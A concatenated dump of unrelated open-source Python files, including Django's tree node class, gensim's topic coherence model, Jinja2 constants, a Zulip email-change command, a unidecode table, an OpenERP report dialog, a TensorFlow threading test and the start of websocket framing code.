        self.task = task
| gpl-3.0 |
michelts/lettuce | tests/integration/lib/Django-1.3/django/utils/tree.py | 310 | 5778 | """
A class for storing a tree graph. Primarily used for filter constructs in the
ORM.
"""
from django.utils.copycompat import deepcopy
class Node(object):
    """
    A single internal node in the tree graph. A Node should be viewed as a
    connection (the root) with the children being either leaf nodes or other
    Node instances.
    """
    # Standard connector type. Clients usually won't use this at all and
    # subclasses will usually override the value.
    default = 'DEFAULT'

    def __init__(self, children=None, connector=None, negated=False):
        """
        Constructs a new Node. If no connector is given, the default will be
        used.

        Warning: You probably don't want to pass in the 'negated' parameter. It
        is NOT the same as constructing a node and calling negate() on the
        result.
        """
        # Copy the caller's list so later external mutation can't alias us.
        self.children = children and children[:] or []
        self.connector = connector or self.default
        # Stack of snapshots of this node's state, pushed by start_subtree()
        # and popped by end_subtree().
        self.subtree_parents = []
        self.negated = negated

    # We need this because of django.db.models.query_utils.Q. Q. __init__() is
    # problematic, but it is a natural Node subclass in all other respects.
    def _new_instance(cls, children=None, connector=None, negated=False):
        """
        This is called to create a new instance of this class when we need new
        Nodes (or subclasses) in the internal code in this class. Normally, it
        just shadows __init__(). However, subclasses with an __init__ signature
        that is not an extension of Node.__init__ might need to implement this
        method to allow a Node to create a new instance of them (if they have
        any extra setting up to do).
        """
        # Build a plain Node, then swap in the subclass so the subclass's
        # (possibly incompatible) __init__ is never invoked.
        obj = Node(children, connector, negated)
        obj.__class__ = cls
        return obj
    _new_instance = classmethod(_new_instance)

    def __str__(self):
        if self.negated:
            return '(NOT (%s: %s))' % (self.connector, ', '.join([str(c) for c
                    in self.children]))
        return '(%s: %s)' % (self.connector, ', '.join([str(c) for c in
                self.children]))

    def __deepcopy__(self, memodict):
        """
        Utility method used by copy.deepcopy().
        """
        obj = Node(connector=self.connector, negated=self.negated)
        obj.__class__ = self.__class__
        obj.children = deepcopy(self.children, memodict)
        obj.subtree_parents = deepcopy(self.subtree_parents, memodict)
        return obj

    def __len__(self):
        """
        The size of a node if the number of children it has.
        """
        return len(self.children)

    def __nonzero__(self):
        """
        For truth value testing.
        """
        # Python 2 truth protocol: a node is truthy when it has children.
        return bool(self.children)

    def __contains__(self, other):
        """
        Returns True is 'other' is a direct child of this instance.
        """
        return other in self.children

    def add(self, node, conn_type):
        """
        Adds a new node to the tree. If the conn_type is the same as the root's
        current connector type, the node is added to the first level.
        Otherwise, the whole tree is pushed down one level and a new root
        connector is created, connecting the existing tree and the new node.
        """
        if node in self.children and conn_type == self.connector:
            return
        # With fewer than two children the connector carries no information
        # yet, so it can simply be adopted.
        if len(self.children) < 2:
            self.connector = conn_type
        if self.connector == conn_type:
            # Same connector: merge in place. A child Node with the same
            # connector (or only one child) can be flattened into this level.
            if isinstance(node, Node) and (node.connector == conn_type or
                    len(node) == 1):
                self.children.extend(node.children)
            else:
                self.children.append(node)
        else:
            # Different connector: push the existing tree down one level and
            # join it with the new node under the new connector.
            obj = self._new_instance(self.children, self.connector,
                    self.negated)
            self.connector = conn_type
            self.children = [obj, node]

    def negate(self):
        """
        Negate the sense of the root connector. This reorganises the children
        so that the current node has a single child: a negated node containing
        all the previous children. This slightly odd construction makes adding
        new children behave more intuitively.

        Interpreting the meaning of this negate is up to client code. This
        method is useful for implementing "not" arrangements.
        """
        self.children = [self._new_instance(self.children, self.connector,
                not self.negated)]
        self.connector = self.default

    def start_subtree(self, conn_type):
        """
        Sets up internal state so that new nodes are added to a subtree of the
        current node. The conn_type specifies how the sub-tree is joined to the
        existing children.
        """
        if len(self.children) == 1:
            self.connector = conn_type
        elif self.connector != conn_type:
            # Connector conflict: push the existing children down one level
            # (same shape as in add()).
            self.children = [self._new_instance(self.children, self.connector,
                    self.negated)]
            self.connector = conn_type
            self.negated = False

        # Snapshot the current state onto the stack, then reset this node to
        # act as the empty root of the new subtree.
        self.subtree_parents.append(self.__class__(self.children,
                self.connector, self.negated))
        self.connector = self.default
        self.negated = False
        self.children = []

    def end_subtree(self):
        """
        Closes off the most recently unmatched start_subtree() call.

        This puts the current state into a node of the parent tree and returns
        the current instances state to be the parent.
        """
        # Pop the saved parent state, wrap the subtree built since
        # start_subtree() into its own node, restore the parent state onto
        # self and attach the subtree as a child.
        obj = self.subtree_parents.pop()
        node = self.__class__(self.children, self.connector)
        self.connector = obj.connector
        self.negated = obj.negated
        self.children = obj.children
        self.children.append(node)
| gpl-3.0 |
dsquareindia/gensim | gensim/models/coherencemodel.py | 8 | 10693 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2010 Radim Rehurek <radimrehurek@seznam.cz>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Module for calculating topic coherence in python. This is the implementation of
the four stage topic coherence pipeline from the paper [1]_.
The four stage pipeline is basically:
Segmentation -> Probability Estimation -> Confirmation Measure -> Aggregation.
Implementation of this pipeline allows for the user to in essence "make" a
coherence measure of his/her choice by choosing a method in each of the pipelines.
.. [1] Michael Roeder, Andreas Both and Alexander Hinneburg. Exploring the space of topic
coherence measures. http://svn.aksw.org/papers/2015/WSDM_Topic_Evaluation/public.pdf.
"""
import logging
from gensim import interfaces
from gensim.topic_coherence import (segmentation, probability_estimation,
direct_confirmation_measure, indirect_confirmation_measure,
aggregation)
from gensim.matutils import argsort
from gensim.utils import is_corpus, FakeDict
from gensim.models.ldamodel import LdaModel
from gensim.models.wrappers import LdaVowpalWabbit, LdaMallet
import numpy as np
from collections import namedtuple
logger = logging.getLogger(__name__)
boolean_document_based = ['u_mass']
sliding_window_based = ['c_v', 'c_uci', 'c_npmi']
make_pipeline = namedtuple('Coherence_Measure', 'seg, prob, conf, aggr')
coherence_dict = {
'u_mass': make_pipeline(segmentation.s_one_pre,
probability_estimation.p_boolean_document,
direct_confirmation_measure.log_conditional_probability,
aggregation.arithmetic_mean),
'c_v': make_pipeline(segmentation.s_one_set,
probability_estimation.p_boolean_sliding_window,
indirect_confirmation_measure.cosine_similarity,
aggregation.arithmetic_mean),
'c_uci': make_pipeline(segmentation.s_one_one,
probability_estimation.p_boolean_sliding_window,
direct_confirmation_measure.log_ratio_measure,
aggregation.arithmetic_mean),
'c_npmi': make_pipeline(segmentation.s_one_one,
probability_estimation.p_boolean_sliding_window,
direct_confirmation_measure.log_ratio_measure,
aggregation.arithmetic_mean),
}
sliding_windows_dict = {
'c_v': 110,
'c_uci': 10,
'c_npmi': 10
}
class CoherenceModel(interfaces.TransformationABC):
    """
    Objects of this class allow for building and maintaining a model for topic
    coherence.

    The main methods are:

    1. constructor, which initializes the four stage pipeline by accepting a coherence measure,
    2. the ``get_coherence()`` method, which returns the topic coherence.

    One way of using this feature is through providing a trained topic model. A dictionary has to be explicitly
    provided if the model does not contain a dictionary already::

        cm = CoherenceModel(model=tm, corpus=corpus, coherence='u_mass')  # tm is the trained topic model
        cm.get_coherence()

    Another way of using this feature is through providing tokenized topics such as::

        topics = [['human', 'computer', 'system', 'interface'],
                  ['graph', 'minors', 'trees', 'eps']]
        cm = CoherenceModel(topics=topics, corpus=corpus, dictionary=dictionary, coherence='u_mass')  # note that a dictionary has to be provided.
        cm.get_coherence()

    Model persistency is achieved via its load/save methods.
    """
    def __init__(self, model=None, topics=None, texts=None, corpus=None, dictionary=None, window_size=None, coherence='c_v', topn=10):
        """
        Args:
        ----
        model : Pre-trained topic model. Should be provided if topics is not provided.
                Currently supports LdaModel, LdaMallet wrapper and LdaVowpalWabbit wrapper. Use 'topics'
                parameter to plug in an as yet unsupported model.
        topics : List of tokenized topics. If this is preferred over model, dictionary should be provided. eg::
                     topics = [['human', 'machine', 'computer', 'interface'],
                               ['graph', 'trees', 'binary', 'widths']]
        texts : Tokenized texts. Needed for coherence models that use sliding window based probability estimator, eg::
                    texts = [['system', 'human', 'system', 'eps'],
                             ['user', 'response', 'time'],
                             ['trees'],
                             ['graph', 'trees'],
                             ['graph', 'minors', 'trees'],
                             ['graph', 'minors', 'survey']]
        corpus : Gensim document corpus.
        dictionary : Gensim dictionary mapping of id word to create corpus. If model.id2word is present, this is not needed.
                     If both are provided, dictionary will be used.
        window_size : Is the size of the window to be used for coherence measures using boolean sliding window as their
                      probability estimator. For 'u_mass' this doesn't matter.
                      If left 'None' the default window sizes are used which are:
                          'c_v' : 110
                          'c_uci' : 10
                          'c_npmi' : 10
        coherence : Coherence measure to be used. Supported values are:
                    'u_mass'
                    'c_v'
                    'c_uci' also popularly known as c_pmi
                    'c_npmi'
                    For 'u_mass' corpus should be provided. If texts is provided, it will be converted to corpus using the dictionary.
                    For 'c_v', 'c_uci' and 'c_npmi' texts should be provided. Corpus is not needed.
        topn : Integer corresponding to the number of top words to be extracted from each topic.
        """
        if model is None and topics is None:
            raise ValueError("One of model or topics has to be provided.")
        elif topics is not None and dictionary is None:
            raise ValueError("dictionary has to be provided if topics are to be used.")
        if texts is None and corpus is None:
            raise ValueError("One of texts or corpus has to be provided.")
        # Check if associated dictionary is provided.
        if dictionary is None:
            if isinstance(model.id2word, FakeDict):
                raise ValueError("The associated dictionary should be provided with the corpus or 'id2word' for topic model"
                                 " should be set as the associated dictionary.")
            else:
                self.dictionary = model.id2word
        else:
            self.dictionary = dictionary
        # Check for correct inputs for u_mass coherence measure.
        if coherence in boolean_document_based:
            if is_corpus(corpus)[0]:
                self.corpus = corpus
            elif texts is not None:
                self.texts = texts
                self.corpus = [self.dictionary.doc2bow(text) for text in self.texts]
            else:
                raise ValueError("Either 'corpus' with 'dictionary' or 'texts' should be provided for %s coherence." % coherence)
        # Check for correct inputs for c_v coherence measure.
        elif coherence in sliding_window_based:
            self.window_size = window_size
            if texts is None:
                raise ValueError("'texts' should be provided for %s coherence." % coherence)
            else:
                self.texts = texts
        else:
            raise ValueError("%s coherence is not currently supported." % coherence)

        self.topn = topn
        self.model = model
        if model is not None:
            self.topics = self._get_topics()
        elif topics is not None:
            # Map word tokens to their dictionary ids so all downstream
            # pipeline stages work on integer ids.
            self.topics = []
            for topic in topics:
                t_i = []
                for n, _ in enumerate(topic):
                    t_i.append(dictionary.token2id[topic[n]])
                self.topics.append(np.array(t_i))
        self.coherence = coherence

    def __str__(self):
        return coherence_dict[self.coherence].__str__()

    def _get_topics(self):
        """Internal helper function to return topics from a trained topic model."""
        topics = []
        if isinstance(self.model, LdaModel):
            for topic in self.model.state.get_lambda():
                bestn = argsort(topic, topn=self.topn, reverse=True)
                topics.append(bestn)
        elif isinstance(self.model, LdaVowpalWabbit):
            for topic in self.model._get_topics():
                bestn = argsort(topic, topn=self.topn, reverse=True)
                topics.append(bestn)
        elif isinstance(self.model, LdaMallet):
            for topic in self.model.word_topics:
                bestn = argsort(topic, topn=self.topn, reverse=True)
                topics.append(bestn)
        else:
            raise ValueError("This topic model is not currently supported. Supported topic models are"
                             "LdaModel, LdaVowpalWabbit and LdaMallet.")
        return topics

    def get_coherence(self):
        """
        Return coherence value based on pipeline parameters.
        """
        measure = coherence_dict[self.coherence]
        segmented_topics = measure.seg(self.topics)
        if self.coherence in boolean_document_based:
            per_topic_postings, num_docs = measure.prob(self.corpus, segmented_topics)
            confirmed_measures = measure.conf(segmented_topics, per_topic_postings, num_docs)
        elif self.coherence in sliding_window_based:
            # BUG FIX: the original condition was inverted
            # (`if self.window_size is not None: ...`), which clobbered any
            # user-supplied window size with the built-in default and left
            # window_size as None when the user supplied nothing. Only fall
            # back to the per-measure default when no size was given.
            if self.window_size is None:
                self.window_size = sliding_windows_dict[self.coherence]
            per_topic_postings, num_windows = measure.prob(texts=self.texts, segmented_topics=segmented_topics,
                                                           dictionary=self.dictionary, window_size=self.window_size)
            if self.coherence == 'c_v':
                confirmed_measures = measure.conf(self.topics, segmented_topics, per_topic_postings, 'nlr', 1, num_windows)
            else:
                if self.coherence == 'c_npmi':
                    normalize = True
                else:
                    # For c_uci
                    normalize = False
                confirmed_measures = measure.conf(segmented_topics, per_topic_postings, num_windows, normalize=normalize)
        return measure.aggr(confirmed_measures)
| lgpl-2.1 |
evanma92/routeh | flask/lib/python2.7/site-packages/jinja2/constants.py | 1169 | 1626 | # -*- coding: utf-8 -*-
"""
jinja.constants
~~~~~~~~~~~~~~~
Various constants.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
#: list of lorem ipsum words used by the lipsum() helper function
LOREM_IPSUM_WORDS = u'''\
a ac accumsan ad adipiscing aenean aliquam aliquet amet ante aptent arcu at
auctor augue bibendum blandit class commodo condimentum congue consectetuer
consequat conubia convallis cras cubilia cum curabitur curae cursus dapibus
diam dictum dictumst dignissim dis dolor donec dui duis egestas eget eleifend
elementum elit enim erat eros est et etiam eu euismod facilisi facilisis fames
faucibus felis fermentum feugiat fringilla fusce gravida habitant habitasse hac
hendrerit hymenaeos iaculis id imperdiet in inceptos integer interdum ipsum
justo lacinia lacus laoreet lectus leo libero ligula litora lobortis lorem
luctus maecenas magna magnis malesuada massa mattis mauris metus mi molestie
mollis montes morbi mus nam nascetur natoque nec neque netus nibh nisi nisl non
nonummy nostra nulla nullam nunc odio orci ornare parturient pede pellentesque
penatibus per pharetra phasellus placerat platea porta porttitor posuere
potenti praesent pretium primis proin pulvinar purus quam quis quisque rhoncus
ridiculus risus rutrum sagittis sapien scelerisque sed sem semper senectus sit
sociis sociosqu sodales sollicitudin suscipit suspendisse taciti tellus tempor
tempus tincidunt torquent tortor tristique turpis ullamcorper ultrices
ultricies urna ut varius vehicula vel velit venenatis vestibulum vitae vivamus
viverra volutpat vulputate'''
| bsd-3-clause |
jphilipsen05/zulip | zerver/management/commands/change_user_email.py | 41 | 1146 | from __future__ import absolute_import
from __future__ import print_function
from typing import Any
from argparse import ArgumentParser
from django.core.management.base import BaseCommand
from zerver.lib.actions import do_change_user_email
from zerver.models import UserProfile, get_user_profile_by_email
class Command(BaseCommand):
    """Management command that rewrites a user's email address."""

    help = """Change the email address for a user."""

    def add_arguments(self, parser):
        # type: (ArgumentParser) -> None
        """Declare the two positional email arguments."""
        for name, metavar, help_text in (
                ('old_email', '<old email>', 'email address to change'),
                ('new_email', '<new email>', 'new email address')):
            parser.add_argument(name, metavar=metavar, type=str,
                                help=help_text)

    def handle(self, *args, **options):
        # type: (*Any, **str) -> None
        """Look up the user by the old email and apply the change."""
        try:
            user_profile = get_user_profile_by_email(options['old_email'])
        except UserProfile.DoesNotExist:
            print("Old e-mail doesn't exist in the system.")
            exit(1)
        do_change_user_email(user_profile, options['new_email'])
| apache-2.0 |
didzis/CAMR | stanfordnlp/unidecode/x0ca.py | 253 | 5007 | data = (
'jjael', # 0x00
'jjaelg', # 0x01
'jjaelm', # 0x02
'jjaelb', # 0x03
'jjaels', # 0x04
'jjaelt', # 0x05
'jjaelp', # 0x06
'jjaelh', # 0x07
'jjaem', # 0x08
'jjaeb', # 0x09
'jjaebs', # 0x0a
'jjaes', # 0x0b
'jjaess', # 0x0c
'jjaeng', # 0x0d
'jjaej', # 0x0e
'jjaec', # 0x0f
'jjaek', # 0x10
'jjaet', # 0x11
'jjaep', # 0x12
'jjaeh', # 0x13
'jjya', # 0x14
'jjyag', # 0x15
'jjyagg', # 0x16
'jjyags', # 0x17
'jjyan', # 0x18
'jjyanj', # 0x19
'jjyanh', # 0x1a
'jjyad', # 0x1b
'jjyal', # 0x1c
'jjyalg', # 0x1d
'jjyalm', # 0x1e
'jjyalb', # 0x1f
'jjyals', # 0x20
'jjyalt', # 0x21
'jjyalp', # 0x22
'jjyalh', # 0x23
'jjyam', # 0x24
'jjyab', # 0x25
'jjyabs', # 0x26
'jjyas', # 0x27
'jjyass', # 0x28
'jjyang', # 0x29
'jjyaj', # 0x2a
'jjyac', # 0x2b
'jjyak', # 0x2c
'jjyat', # 0x2d
'jjyap', # 0x2e
'jjyah', # 0x2f
'jjyae', # 0x30
'jjyaeg', # 0x31
'jjyaegg', # 0x32
'jjyaegs', # 0x33
'jjyaen', # 0x34
'jjyaenj', # 0x35
'jjyaenh', # 0x36
'jjyaed', # 0x37
'jjyael', # 0x38
'jjyaelg', # 0x39
'jjyaelm', # 0x3a
'jjyaelb', # 0x3b
'jjyaels', # 0x3c
'jjyaelt', # 0x3d
'jjyaelp', # 0x3e
'jjyaelh', # 0x3f
'jjyaem', # 0x40
'jjyaeb', # 0x41
'jjyaebs', # 0x42
'jjyaes', # 0x43
'jjyaess', # 0x44
'jjyaeng', # 0x45
'jjyaej', # 0x46
'jjyaec', # 0x47
'jjyaek', # 0x48
'jjyaet', # 0x49
'jjyaep', # 0x4a
'jjyaeh', # 0x4b
'jjeo', # 0x4c
'jjeog', # 0x4d
'jjeogg', # 0x4e
'jjeogs', # 0x4f
'jjeon', # 0x50
'jjeonj', # 0x51
'jjeonh', # 0x52
'jjeod', # 0x53
'jjeol', # 0x54
'jjeolg', # 0x55
'jjeolm', # 0x56
'jjeolb', # 0x57
'jjeols', # 0x58
'jjeolt', # 0x59
'jjeolp', # 0x5a
'jjeolh', # 0x5b
'jjeom', # 0x5c
'jjeob', # 0x5d
'jjeobs', # 0x5e
'jjeos', # 0x5f
'jjeoss', # 0x60
'jjeong', # 0x61
'jjeoj', # 0x62
'jjeoc', # 0x63
'jjeok', # 0x64
'jjeot', # 0x65
'jjeop', # 0x66
'jjeoh', # 0x67
'jje', # 0x68
'jjeg', # 0x69
'jjegg', # 0x6a
'jjegs', # 0x6b
'jjen', # 0x6c
'jjenj', # 0x6d
'jjenh', # 0x6e
'jjed', # 0x6f
'jjel', # 0x70
'jjelg', # 0x71
'jjelm', # 0x72
'jjelb', # 0x73
'jjels', # 0x74
'jjelt', # 0x75
'jjelp', # 0x76
'jjelh', # 0x77
'jjem', # 0x78
'jjeb', # 0x79
'jjebs', # 0x7a
'jjes', # 0x7b
'jjess', # 0x7c
'jjeng', # 0x7d
'jjej', # 0x7e
'jjec', # 0x7f
'jjek', # 0x80
'jjet', # 0x81
'jjep', # 0x82
'jjeh', # 0x83
'jjyeo', # 0x84
'jjyeog', # 0x85
'jjyeogg', # 0x86
'jjyeogs', # 0x87
'jjyeon', # 0x88
'jjyeonj', # 0x89
'jjyeonh', # 0x8a
'jjyeod', # 0x8b
'jjyeol', # 0x8c
'jjyeolg', # 0x8d
'jjyeolm', # 0x8e
'jjyeolb', # 0x8f
'jjyeols', # 0x90
'jjyeolt', # 0x91
'jjyeolp', # 0x92
'jjyeolh', # 0x93
'jjyeom', # 0x94
'jjyeob', # 0x95
'jjyeobs', # 0x96
'jjyeos', # 0x97
'jjyeoss', # 0x98
'jjyeong', # 0x99
'jjyeoj', # 0x9a
'jjyeoc', # 0x9b
'jjyeok', # 0x9c
'jjyeot', # 0x9d
'jjyeop', # 0x9e
'jjyeoh', # 0x9f
'jjye', # 0xa0
'jjyeg', # 0xa1
'jjyegg', # 0xa2
'jjyegs', # 0xa3
'jjyen', # 0xa4
'jjyenj', # 0xa5
'jjyenh', # 0xa6
'jjyed', # 0xa7
'jjyel', # 0xa8
'jjyelg', # 0xa9
'jjyelm', # 0xaa
'jjyelb', # 0xab
'jjyels', # 0xac
'jjyelt', # 0xad
'jjyelp', # 0xae
'jjyelh', # 0xaf
'jjyem', # 0xb0
'jjyeb', # 0xb1
'jjyebs', # 0xb2
'jjyes', # 0xb3
'jjyess', # 0xb4
'jjyeng', # 0xb5
'jjyej', # 0xb6
'jjyec', # 0xb7
'jjyek', # 0xb8
'jjyet', # 0xb9
'jjyep', # 0xba
'jjyeh', # 0xbb
'jjo', # 0xbc
'jjog', # 0xbd
'jjogg', # 0xbe
'jjogs', # 0xbf
'jjon', # 0xc0
'jjonj', # 0xc1
'jjonh', # 0xc2
'jjod', # 0xc3
'jjol', # 0xc4
'jjolg', # 0xc5
'jjolm', # 0xc6
'jjolb', # 0xc7
'jjols', # 0xc8
'jjolt', # 0xc9
'jjolp', # 0xca
'jjolh', # 0xcb
'jjom', # 0xcc
'jjob', # 0xcd
'jjobs', # 0xce
'jjos', # 0xcf
'jjoss', # 0xd0
'jjong', # 0xd1
'jjoj', # 0xd2
'jjoc', # 0xd3
'jjok', # 0xd4
'jjot', # 0xd5
'jjop', # 0xd6
'jjoh', # 0xd7
'jjwa', # 0xd8
'jjwag', # 0xd9
'jjwagg', # 0xda
'jjwags', # 0xdb
'jjwan', # 0xdc
'jjwanj', # 0xdd
'jjwanh', # 0xde
'jjwad', # 0xdf
'jjwal', # 0xe0
'jjwalg', # 0xe1
'jjwalm', # 0xe2
'jjwalb', # 0xe3
'jjwals', # 0xe4
'jjwalt', # 0xe5
'jjwalp', # 0xe6
'jjwalh', # 0xe7
'jjwam', # 0xe8
'jjwab', # 0xe9
'jjwabs', # 0xea
'jjwas', # 0xeb
'jjwass', # 0xec
'jjwang', # 0xed
'jjwaj', # 0xee
'jjwac', # 0xef
'jjwak', # 0xf0
'jjwat', # 0xf1
'jjwap', # 0xf2
'jjwah', # 0xf3
'jjwae', # 0xf4
'jjwaeg', # 0xf5
'jjwaegg', # 0xf6
'jjwaegs', # 0xf7
'jjwaen', # 0xf8
'jjwaenj', # 0xf9
'jjwaenh', # 0xfa
'jjwaed', # 0xfb
'jjwael', # 0xfc
'jjwaelg', # 0xfd
'jjwaelm', # 0xfe
'jjwaelb', # 0xff
)
| gpl-2.0 |
ritchyteam/odoo | addons/account_payment/wizard/__init__.py | 436 | 1144 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_payment_order
import account_payment_populate_statement
import account_payment_pay
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
apocalypsebg/odoo | addons/base_report_designer/plugin/openerp_report_designer/bin/script/NewReport.py | 384 | 3903 | #########################################################################
#
# Copyright (c) 2003-2004 Danny Brewer d29583@groovegarden.com
# Copyright (C) 2004-2010 OpenERP SA (<http://openerp.com>).
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# See: http://www.gnu.org/licenses/lgpl.html
#
#############################################################################
import uno
import string
import unohelper
import xmlrpclib
from com.sun.star.task import XJobExecutor
# When run as a plain script/macro (not deployed as a packaged extension),
# pull the GUI helpers in from the local lib directory and use hard-coded
# test credentials.  NOTE: `<>` is Python 2-only syntax.
if __name__<>"package":
    from lib.gui import *
    from lib.error import ErrorDialog
    from lib.functions import *
    from lib.logreport import *
    from LoginTest import *
    from lib.rpc import *
    database="test"   # test database name used when not packaged
    uid = 3           # test user id used when not packaged
#
#
#
# Start OpenOffice.org, listen for connections and open testing document
#
#
class NewReport(unohelper.Base, XJobExecutor):
    """OpenOffice job that lets the user pick an OpenERP model for a new
    report and stores the chosen model name in the document's user fields.

    Relies on globals populated elsewhere (``loginstatus``, ``passwd``,
    ``url``, ``database``, ``uid``) by the login dialog / module scaffolding.
    """

    def __init__(self, ctx):
        # ctx: UNO component context supplied by OpenOffice.
        self.ctx = ctx
        self.module = "openerp_report"
        self.version = "0.1"
        LoginTest()
        self.logobj=Logger()
        # Abort when deployed as an extension without a valid login.
        if not loginstatus and __name__=="package":
            exit(1)

        # Build the modal dialog with a label, list box and two buttons.
        self.win=DBModalDialog(60, 50, 180, 115, "Open New Report")
        self.win.addFixedText("lblModuleSelection", 2, 2, 60, 15, "Module Selection")
        self.win.addComboListBox("lstModule", -2,13,176,80 , False)
        self.lstModule = self.win.getControl( "lstModule" )
        # Model identifiers, kept parallel to the list box entries.
        self.aModuleName=[]
        desktop=getDesktop()
        doc = desktop.getCurrentComponent()
        docinfo=doc.getDocumentInfo()
        global passwd
        self.password = passwd
        global url
        self.sock=RPCSession(url)
        # Fetch every ir.model record (model, name) and fill the list box
        # sorted by display name.
        ids = self.sock.execute(database, uid, self.password, 'ir.model' , 'search',[])
        fields = [ 'model','name']
        res = self.sock.execute(database, uid, self.password, 'ir.model' , 'read', ids, fields)
        # Python 2-only sort (cmp + comparison lambda).
        res.sort(lambda x, y: cmp(x['name'],y['name']))
        for i in range(len(res)):
            self.lstModule.addItem(res[i]['name'],self.lstModule.getItemCount())
            self.aModuleName.append(res[i]['model'])
        self.win.addButton('btnOK',-2 ,-5, 70,15,'Use Module in Report' ,actionListenerProc = self.btnOk_clicked )
        self.win.addButton('btnCancel',-2 - 70 - 5 ,-5, 35,15,'Cancel' ,actionListenerProc = self.btnCancel_clicked )
        self.win.doModalDialog("",None)

    def btnOk_clicked(self, oActionEvent):
        """Store the selected model name in document user field 3, log it,
        and close the dialog."""
        desktop=getDesktop()
        doc = desktop.getCurrentComponent()
        docinfo=doc.getDocumentInfo()
        docinfo.setUserFieldValue(3,self.aModuleName[self.lstModule.getSelectedItemPos()])
        self.logobj.log_write('Module Name',LOG_INFO, ':Module use in creating a report %s using database %s' % (self.aModuleName[self.lstModule.getSelectedItemPos()], database))
        self.win.endExecute()

    def btnCancel_clicked(self, oActionEvent):
        """Dismiss the dialog without saving anything."""
        self.win.endExecute()
# Entry points: run the dialog directly when executed as a script, or
# register the UNO component when loaded as an OpenOffice extension package.
if __name__<>"package" and __name__=="__main__":
    NewReport(None)
elif __name__=="package":
    g_ImplementationHelper.addImplementation( \
            NewReport,
            "org.openoffice.openerp.report.opennewreport",
            ("com.sun.star.task.Job",),)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
mixturemodel-flow/tensorflow | tensorflow/contrib/training/python/training/sampling_ops_threading_test.py | 129 | 2884 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=unused-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.training.python.training import sampling_ops
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import coordinator
from tensorflow.python.training import queue_runner_impl
class SamplingOpsThreadingTest(test.TestCase):
  """Checks that sampling_ops internals behave under concurrent fetches."""

  def testMultiThreadedEstimateDataDistribution(self):
    """_estimate_data_distribution must be safe to fetch from many threads."""
    num_classes = 10

    # Set up graph.
    random_seed.set_random_seed(1234)
    label = math_ops.cast(
        math_ops.round(random_ops.random_uniform([1]) * num_classes),
        dtypes_lib.int32)

    prob_estimate = sampling_ops._estimate_data_distribution(  # pylint: disable=protected-access
        label, num_classes)
    # Check that prob_estimate is well-behaved in a multithreaded context.
    _, _, [prob_estimate] = sampling_ops._verify_input(  # pylint: disable=protected-access
        [], label, [prob_estimate])

    # Use queues to run multiple threads over the graph, each of which
    # fetches `prob_estimate`.
    queue = data_flow_ops.FIFOQueue(
        capacity=25,
        dtypes=[prob_estimate.dtype],
        shapes=[prob_estimate.get_shape()])
    enqueue_op = queue.enqueue([prob_estimate])
    # 25 parallel enqueue threads all evaluate prob_estimate concurrently.
    queue_runner_impl.add_queue_runner(
        queue_runner_impl.QueueRunner(queue, [enqueue_op] * 25))
    out_tensor = queue.dequeue()

    # Run the multi-threaded session.
    with self.test_session() as sess:
      # Need to initialize variables that keep running total of classes seen.
      variables.global_variables_initializer().run()

      coord = coordinator.Coordinator()
      threads = queue_runner_impl.start_queue_runners(coord=coord)

      # Drain 25 results; the test passes if no thread raises.
      for _ in range(25):
        sess.run([out_tensor])

      coord.request_stop()
      coord.join(threads)
# Run via the TensorFlow test runner when executed as a script.
if __name__ == '__main__':
  test.main()
| apache-2.0 |
andrewsy97/Treehacks | websocket/_abnf.py | 52 | 12382 | """
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1335 USA
"""
import six
import array
import struct
import os
from ._exceptions import *
from ._utils import validate_utf8
try:
    # If wsaccel is available we use compiled routines to mask data.
    from wsaccel.xormask import XorMaskerSimple

    def _mask(_m, _d):
        """XOR-mask payload *_d* with 4-byte key *_m* via wsaccel's C code."""
        return XorMaskerSimple(_m).process(_d)
except ImportError:
